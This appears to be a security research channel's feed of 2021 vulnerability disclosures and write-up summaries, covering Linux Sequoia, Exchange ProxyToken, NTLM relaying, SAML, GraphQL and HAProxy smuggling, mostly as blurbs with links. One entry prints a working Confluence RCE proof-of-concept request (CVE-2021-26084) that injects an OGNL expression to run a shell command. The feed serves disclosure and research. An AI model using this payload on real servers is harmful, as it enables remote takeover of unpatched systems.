Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤 by Bharat Jogi

"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."

📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)

https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909

Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq

You should turn off autofill in your password manager
👤 by @marektoth

11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best-practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.

📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion

https://marektoth.com/blog/password-managers-autofill/

NTLM relaying to AD CS - On certificates, printers and a little hippo
👤 by @_dirkjan

More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.

📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools

https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

✍️We would like to share with the community some uncommon but not unique cases from our experience. Let us know if you like this format.

✅Stored XSS using .xbl files.

SAML is insecure by design
👤 by @joonas_fi

"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."

📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading

https://joonas.fi/2021/08/saml-is-insecure-by-design/

Site-wide CSRF using the GraphQL API

MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy.

RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith.

Advisory: https://mybb.com/versions/1.8.25/

🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE!

Current: https://support.citrix.com/article/CTX267027

Mar 2021: http://web.archive.org/web/20210321090412/https://support.citrix.com/article/CTX267027

PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
👤 by Simon Zuckerbraun

With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users, for example copying all emails addressed to a target account and forwarding them to an attacker-controlled account. The vulnerability arises due to the authentication module not being loaded on the back end.

📝 Contents:
• The Trigger
• Understanding the Root Cause
• Bagging a Canary
• Conclusion

https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server

Exploiting GraphQL
👤 by @infosec_au

Overview of GraphQL attacks.

📝 Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion

https://blog.assetnote.io/2021/08/29/exploiting-graphql/

Remote Code Execution on Confluence Servers write-up (CVE-2021-26084)
👤 by rootxharsh and iamnoooob

Patch diffing the latest Confluence update results in RCE PoC.

PoC:

POST /pages/doenterpagevariables.action HTTP/2
Host: localhost
Content-Length: 301
Content-Type: application/x-www-form-urlencoded

queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027'.$cmd.'\u0027]);x.start()\u0022)}%2b\u0027

📝 Contents:
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

SAP refused to disclose which CVEs were assigned to vulnerabilities reported by our researcher Mikhail Klyuchnikov, if any.

Three subsequent letters remain unanswered.

We believe the CVEs to be CVE-2021-33690 (CVSS 9.9) and CVE-2021-33691 (CVSS 6.9) in the August hotfix.

Join the discussion on Twitter: https://twitter.com/ptswarm/status/1433070547399757824

RCE on a backend IIS server via file upload with an atypical file extension.

More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP

Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling
👤 by Ori Hollander and Or Peles

The vulnerability, CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.

📝 Contents:
• Technical Background
• HTTP Request Smuggling
• HAProxy’s HTTP request processing phases (simplified)
• Attack Scenario – Bypassing http-request ACLs
• What happens inside HAProxy
• Getting the HTTP response for the smuggled request
• Attack demonstration – ACL bypass
• Vulnerability Details
• Automating the Discovery
• Fixes and Workarounds

https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/

The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
👤 by @jensneuse_de

The complete GraphQL security guide. 'Nuff said.

📝 Contents:
• The 13 most common GraphQL Vulnerabilities
• Solving the 13 most common GraphQL Vulnerabilities for private APIs
• Solving the 13 most common GraphQL Vulnerabilities for public APIs

https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready

PAX Technology fixed three vulnerabilities discovered by our researcher Artem Ivachev.

When chained together these vulnerabilities allow the interception of user card data and the sending of arbitrary data to the processing of the acquiring bank.💰

SAP fixed Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver found by our researcher Mikhail Klyuchnikov.

CVSS 9.9 🔥

No credits from SAP again.

Advisory: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405

RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941) – A Walk-Through
👤 by Markus Wulftange

The vulnerability is triggerable when processing user upload requests, which can lead to Unauthorized RCE.

📝 Contents:
• Background
• The Travelogue
• Finding A Path From Sink To Source
• Are We Still on Track?
• What's in the backpack?
• Running With Razor
• Timeline and fix

https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html

We are thrilled to announce the following presentations at @hardwear_io, @blackhatevents, #POC2021 and @hackinparis

Autodiscovering the Great Leak
👤 by Amit Serper

The design flaw within the Autodiscover protocol that makes it possible for an attacker who controls top-level Autodiscover domains (or has the ability to conduct a DNS-poisoning attack using these domains), to get valid domain credentials from leaky Autodiscover requests.

📝 Contents:
• Executive summary
• Introduction
• What is Autodiscover?
• Abusing the Leak
• The ol’ switcheroo
• Mitigation
• Conclusion

https://www.guardicore.com/labs/autodiscovering-the-great-leak/